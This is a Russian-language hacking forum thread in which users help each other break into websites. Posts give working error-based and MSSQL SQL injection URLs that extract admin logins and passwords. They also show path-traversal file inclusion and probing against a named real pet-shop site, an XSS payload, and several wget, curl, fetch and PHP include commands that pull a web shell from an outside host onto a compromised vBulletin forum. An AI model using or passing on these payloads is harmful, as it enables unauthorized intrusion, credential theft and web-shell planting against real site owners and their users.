Ваши вопросы по уязвимостям.

Читать форум, статей куча, и не флудить в теме.
Если читать не умеешь, а сайт нужен, дать денег кому-нить, кто сломает. Всё просто

 

Тема с выводом инфы через ошибки такая забавная.

Раз:

PHP:

view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,user(),version())+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)

PHP:

Error 1062: Duplicate entry 'user@siteserv:5.1.29-rc-log1' for key 'group_key'

Два:

PHP:

view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,user,password)+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)

PHP:

Item not found

//WTF? Поле password точно есть.

Три:

PHP:

view.php?id=(select+1+from+(select+count(0),concat((select+user+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)

PHP:

Error 1062: Duplicate entry 'admin1' for key 'group_key'

Четыре:

PHP:

view.php?id=(select+1+from+(select+count(0),concat((select+password+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)

PHP:

Item not found

//WTF

Пять:

PHP:

view.php?id=(select+1+from+(select+count(0),concat((select+password+from+users+WHERE+user='admin'),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)

PHP:

Item not found

//WTF

Шесть:

PHP:

view.php?id=(select+1+from+(select+count(0),concat((select+substring(password,1,5)+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)

PHP:

Error 1062: Duplicate entry 'mypas1' for key 'group_key'

В итоге работает такой костыль:

PHP:

view.php?id=(select+1+from+(select+count(0),concat((select+concat_ws(user,substring(password,1,300))+from+users+LIMIT+0,1),floor(rand(0)*3))+from+information_schema.tables+group+by+2+limit+1,1)a)

PHP:

Error 1062: Duplicate entry 'admin:mypassword1' for key 'group_key'

И таки откуда такая проблема и как ее обойти? Substring - не выход, я считаю.

 

Nek1t
https://forum.antichat.ru/showpost.php?p=1802753&postcount=21

Оно?

 

Qwazar
Оно.
Кстати, как показала практика, необязательно резать строку, достаточно ее просто прогнать через эти функции в стиле substr(column,1,350). Ограничение будет, но уже меньше. Причем число 350 получается как некая константа минус длина имен колонок в подзапросе(или вроде того). Надо дальше копать.

Cрабатывает.

Не срабатывает.

Срабатывает.

 

Такой вопрос,
как залить шелл = \
vb 4.0.2
Есть доступ к админке, добавил модуль в faq_complete с содержимым

OC там Linux
Пишу в адресной строке:
http://forum.site.ru/faq.php?cmd=ls
Вижу файлы и папки корня)
Делаю такой запрос в адресной строке:
forum.site.ru/faq.php?cmd=wget www.sitesshelom.ru/shell.php
Долго думает ) и потом вылазит 404 not found, вообщем шелл не заливается = \
подскажите как залить еще можно = \

 

curl --output /kuda/zalivaem/shell.php www.sitesshelom.ru/shell.php
fetch -o /kuda/zalivaem/shell.php www.sitesshelom.ru/shell.php
wget -o /kuda/zalivaem/shell.php www.sitesshelom.ru/shell.php
get www.sitesshelom.ru/shell.php > /kuda/zalivaem/shell.php

если allow_url_include On - include("http://www.sitesshelom.ru/shell.php");

copy('http://www.sitesshelom.ru/shell.php','/kuda/zalivaem/shell.php');

 

можно ли раскрутить следующий инклуд:
http://www.petshopdamigos.gr/index.php?action=xyz
=>
Warning: require(pages/action_xyz.php) [function.require]: failed to open stream: No such file or directory in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index.php on line 408

 

если бы опция magic quotes не была включена, то

PHP:

http://www.petshopdamigos.gr/index.php?action=/../../../../../../../c:boot.ini%00

 

Code:

http://www.petshopdamigos.gr/index.php?action=/../../index.php.........................................................................................................................................................................................

 

а не можно заxeк‎сить?

 

выше способ дали рабочий

 

кстати в поле поиска пасивка.
чтоб обойти mg юзаем асции
<script>alert(String.fromCharCode(88,83,83))</script>
ps http://forum.xakep.ru/m_1298634/tm.htm - понрвилось

 

попугай, wildshaman, Strilo4ka спасибо за помощь и советы


копаю дальше
http://www.petshopdamigos.gr/index.php?action=/../../../../../../inetpub/vhosts/petshopdamigos.gr/httpdocs/admin/info - phpinfo()

есть
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages\config.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages\functions.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin\index.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin\config.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin\functions.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin\info.php
но текст их посмотреть нельзя, только исполнение через require()

http://www.petshopdamigos.gr/test - basic авторизация, ни .htaccess ни .htpasswd там нет, да и сервер там Microsoft-IIS/6.0

доступ к соседям закрыт - Permission denied

sql inj вроде как нигде нет

через http://www.petshopdamigos.gr/index.php?action=05 можно попасть на форму, которая через mail() будет слать письмо

http://www.petshopdamigos.gr/index.php?action=09 ссылок на которую ниоткуда нет выдает:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages\action_09.php on line 9


есть идеи с какой стороны еще можно залезть ?

 

не выводит таблицы ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
в чем может быть проблема?

зато выводит колонки
ID=1+OR+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS)--

 

возможно фильтр на TABLE_NAME, попробуй перевести TABLE_NAME в hex или char
или фильтр на INFORMATIO N_SCHEMA.TABLES - тоже обходится, но как не помню, пусть более просвещенные подскажут

 

операторы нельзя переводить в hеx или char

 

ой, сорри, ступил

 

странно... запрос обрабатывается "нормально" бех вывода ошибок
запрос
ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--

выводит пустую страницу без новостей, и ошибок

 

так попробуй
+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+1+table_name+from+information_schema.tables+order+by+table_name)--
иле так..
ID=convert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--

 

хелп) сос))

Вообщем пытаюсь залить шелл через админку вб 4.0.2
Вообщем подробно не буду...
в модуль впихиваю такой код
system("wget -o /home/www/сайт.by/forum/customavatars/inbex2.php http://сайт.narod.ru/wso2.php");
Захожу на страницу forum.site.ru/faq.php
Думает,думает, и потом вылазит 404 not found
Далее иду по адресу
forum.сайт.by/customavatars/inbex2.php
и тупо белая страница
пытаюсь проделать туже функцию только меняю название шелла которое будет на серваке
и иногда показывает например по адресу
forum.сайт.by/customavatars/inbex3.php такую хрень = \ :

Code:

--2010-04-27 20:25:52-- http://сайт.narod.ru/wso2.php Resolving сайтnarod.ru... 213.180.199.44 Connecting to сайт.narod.ru|213.180.199.44|:80...

и больше ничего = \
кто знает в чем проблема?
почему шелл не заливается???